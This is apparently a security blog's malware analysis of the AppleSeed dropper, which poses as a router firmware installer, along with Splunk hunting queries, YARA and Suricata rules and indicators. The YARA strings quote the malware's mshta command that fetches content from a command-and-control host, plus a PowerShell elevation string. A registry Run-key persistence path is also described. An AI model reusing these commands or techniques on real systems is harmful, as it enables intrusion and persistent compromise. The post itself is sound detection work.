Overview of AppleSeed Dropper

This blog post will briefly cover some additional details of the AppleSeed backdoor originally covered by ASEC’s AhnLab.

As the ASEC team did a great job detailing the initial access methods in this recent attack, we will skip ahead and dive right into the characteristics and analysis of the malware itself.

Malware Analysis

MD5: 851e33373114fef45d0fe28c6934fa73

SHA256: e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f

File name: firmware upgrade installer.exe

FIle type: Win PE

Size: 408kb

As the file name suggests, the executable file is disguised as a router firmware upgrade program and includes a pop-up window to confirm the start of the supposed upgrade, as well as opening iptime.com in the victim’s web browser (Figure 1).

Figure 1: iptime.com site opened in the browser by EXE

While the victim may be under the assumption that an upgrade is in progress, the backdoor is installing itself and creating multiple files in the background.

Of note, the backdoor deleted files as soon as their purpose was served, so unfortunately some files were not able to be retrieved. Digging in our Sysmon logs, we can see the following file created in AppData\Roaming\Media:

Figure 2: Creation of file “wmi-ui-2ff199e9.db”

Following the creation of the .db file, regsvr32 is used with the “/s” argument to run silently and not display any message boxes.

Figure 3: regsvr32 executing .db file

The dropper then uses mshta to connect to leomin.dothome.co[.]kr/update/?mode=login. In previous writeups on the AppleSeed backdoor calls to mshta.exe were used for additional malicious behavior.

At the time of writing, the request only returned an HTTP 200 with no follow-on observable behavior.

Figure 4: mshta connecting to suspicious domain

A handful of randomly named BAT files are created in the %TEMP% directory and run via cmd.exe. Each file is self-deleting, thus further analysis on the files was not possible.

Figure 5: randomly named BAT file

*In addition to the above BAT file, additional .bat files named “2A75”, and “3D24” were also created and executed.

Persistence

SHA256: e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea

Upon the execution and deletion of the final BAT file, persistence is acheived via a DLL named AutoUpdate set as a Registry run key at:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Figure 6: Registry run key for persistence

The above DLL is created at C:\ProgramData\Firmware\Microsoft\Windows\Defender\.

The DLL file is packed using the UPX open source packer, or a similar packer application.

Figure 7: PEid output of autoupdate.dll

Detection Opportunities

Although Kimsuky goes to considerable lengths to cover their tracks (self-deleting BAT files) and obfuscate the backdoor, not all is lost.

Below, I will list a few Splunk queries that would assist us in hunting for this activity if we didn’t have prior knowledge of the malware’s tactics.

1. Detect Mshta Url

Probably our easiest opportunity is to look for mshta and a Url in the command line. Depending on how prevalent mshta is in your environment, your results may vary.

Figure 8: Splunk query for mshta (click for full image)

2. File Creation in Suspicious Path

There likely aren’t many programs in your environment creating executable files in paths like \AppData\Local, so it would be nice to have a fast query to show us when this occurs.

* Inspiration for the below query: https://research.splunk.com/endpoint/executables_or_script_creation_in_suspicious_path/

Figure 9: Splunk query for file creation in suspicious path

3. Detect regsvr32.exe with “silent” switch

This last query will identify instances where the silent switch is used in conjunction with regsvr32.exe. We’ll harden our query and look for both calling the switch with the forward slash, as well as with a hyphen.

In addition, we will also look for those odd file paths as mentioned above, but this may need tweaking. One weak point for this query is that it does not currently check for regsvr32 being renamed.

Figure 10: Splunk query for regsvr32.exe with “/s or -s”

Yara Rules

Disclaimer: I am by no means an expert, matter of fact, I am still looking to get my foot in the door in cybersecurity. Please only utilize the below rules for hunting purposes, not in production.

Dropper

rule NK_APT_AppleSeed_Dropper {
meta:
description = ” – file firmware upgrade installer.exe”
author = “Michael Rippey”
reference = “https://asec.ahnlab.com/ko/34883/”
date = “2022-06-01”
hash = “e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f”
strings:
$a = “powershell.exe start-process \”%s\” -argumentlist ‘%s’ -verb runas” fullword wide
$b1 = “mshta.exe http://leomin.dothome.co.kr/update/?mode=login” fullword ascii
$b2 = “USER32.dll” fullword ascii
$b3 = “KERNEL32.dll” fullword ascii
$b4 = “kernel32.dll” fullword wide
$b5 = “mscoree.dll” fullword wide
$b6 = “https://iptime.com” fullword wide
$b7 = “broken pipe” fullword ascii
$b8 = “executable format error” fullword ascii
$b9 = “host unreachable” fullword ascii
$b10 = “connection already in progress” fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and
1 of ($a*) and 4 of them
}

AppleSeed DLL

rule NK_APT_AppleSeed_Backdoor {
meta:
description = ” – file AutoUpdate.dll”
author = “Michael Rippey”
reference = “https://asec.ahnlab.com/ko/34883/&#8221;
date = “2022-06-01”
hash = “e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea”
strings:
$a1 = “ADVAPI32.dll” fullword ascii
$a2 = “KERNEL32.DLL” fullword ascii
$a3 = “freed.dll” fullword ascii
$a4 = “outlook” fullword wide
$a5 = “CryptEncrypt” fullword ascii
$a6 = “amily not supporte” fullword ascii
$a7 = “connecyar” fullword ascii
$a8 = “rerictaj” fullword ascii
$a9 = “lrgeabik” fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 400KB and
5 of them
}

Suricata Rules

alert http any any -> any any (msg:”NK APT AppleSeed –IOC– domain network connection”; flow:established,to_server; urilen:19; content:”GET”; http_method; content:”/update”; http_uri; content:”?mode=login”; nocase; http_uri; fast_pattern; classtype:trojan-activity; sid:20220601; rev:1; metadata: author “Michael Rippey”, date “2022-06-01”, reference:https://asec.ahnlab.com/ko/34883/;)

MITRE ATT&CK Techniques

ID Technique

T1027 Obfuscated FIle or Information

T1129 Shared Modules

T1547 Persistence, Privilege Escalation

T1566 Phishing

Links/Further Reading

https://asec.ahnlab.com/ko/34883/

https://blog.malwarebytes.com/threat-intelligence/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf

https://blog.malwarebytes.com/threat-intelligence/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

One response to “Overview of AppleSeed Dropper”

%d bloggers like this: